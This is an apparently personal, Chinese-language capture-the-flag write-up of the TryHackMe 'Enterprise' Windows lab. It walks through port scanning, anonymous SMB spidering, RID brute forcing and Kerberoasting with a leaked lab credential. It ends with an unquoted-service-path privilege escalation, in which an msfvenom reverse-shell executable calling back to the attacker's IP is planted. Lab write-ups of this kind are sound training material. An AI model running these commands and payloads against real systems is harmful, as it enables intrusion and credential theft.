Before all
好欸現在在當科班志工owo
Victim’s IP : 10.10.3.132
Victim’s Host : lab.enterprise.thm
Attacker’s IP : 10.9.195.189
Write up
RECON
port scan
Command
1 | rustscan -a 10.10.3.132 --ulimit 5000 -- -sC -sV -Pn |
在這步驟,發現機器有開啟smb, rdp, http(在port 80 以及 port 7790),並獲取DNS域名為LAB.ENTERPRISE.THM
directory enumeration
Command
1 | dirsearch --url http://lab.enterprise.thm/ |
沒料,還被嘴qq
Exploit
smb
其實這步驟是rabbit hole但我搞了一個多小時
先嘗試直接連線:
Command
1 | smbclient -L \\\\lab.enterprise.thm\\Users -N |
連不上QwQ
改為使用crackmapexec中的spider_plus去抓資料:
Command
1 | crackmapexec smb 10.10.3.132 -u 'anonymous' -p '' -M spider_plus -o READ_ONLY=true |
雖然有error訊息但還是成功將資料抓到/tmp/cme_spider_plus/10.10.3.132/裡面了
Command
1 | tree |
找到powershell歷史紀錄,檔案路徑:/tmp/cme_spider_plus/10.10.3.132/Users/LAB-ADMIN/AppData/Roaming/Microsoft/Windows/Powershell/PSReadline/Consolehost_hisory.txt
找到使用者replication的密碼
OSINT
連上 port 7990(http) 後的畫面:
去github上挖寶
嘿,點開people發現只有一個人:
最後找到上面唯一一支腳本的commit
https://github.com/Nik-enterprise-dev/mgmtScript.ps1/commit/bc40c9f237bfbe7be7181e82bebe7c0087eb7ed8
找到使用者nik帳號密碼!
smb again
使用crackmapexec裡面的rid-brute進行使用者/群組暴破
Command
1 | crackmapexec smb lab.enterprise.thm -u 'guest' -p '' --rid-brute |
湊出userlist.txt
1 | Guest |
利用他以及剛剛拿到的nik帳號密碼進行SPN獲取:
Command
1 | python3 GetUserSPNs.py 'lab.enterprise.thm/nik:ToastyBoi!' -usersfile ~/ctf/tryhackme/enterprise/userlist.txt -dc-ip 10.10.3.132 -request |
利用john進行密碼爆破:
Privilege Escalation
RDP進去之後用powershell砸winpeas:
發現 unquoted path string的vulnerability
詳細請見:https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths
舉例來說C:\Cute Shark\Whale womp.exe在被執行的時候如果有個C:\Cute.exe,C:\Cute Shark\Whale.exe等等的那windows解析時就會被誤判,這時候如果可以用別的方法以更高權限去啟動他就能塞後門進去owo
以這台靶機為例,就是可以利用Start-Service zerotieroneservice開啟zeroonetier的服務。
總之,那個資料夾裡面有ZeroTier One.exe,就灌一個ZeroTier.exe的reverse shell進去:
1 | msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.195.189 lport=1004 -f exe -o ./ZeroTier.exe |
在端口1004拿到shell!!!
After all
neko???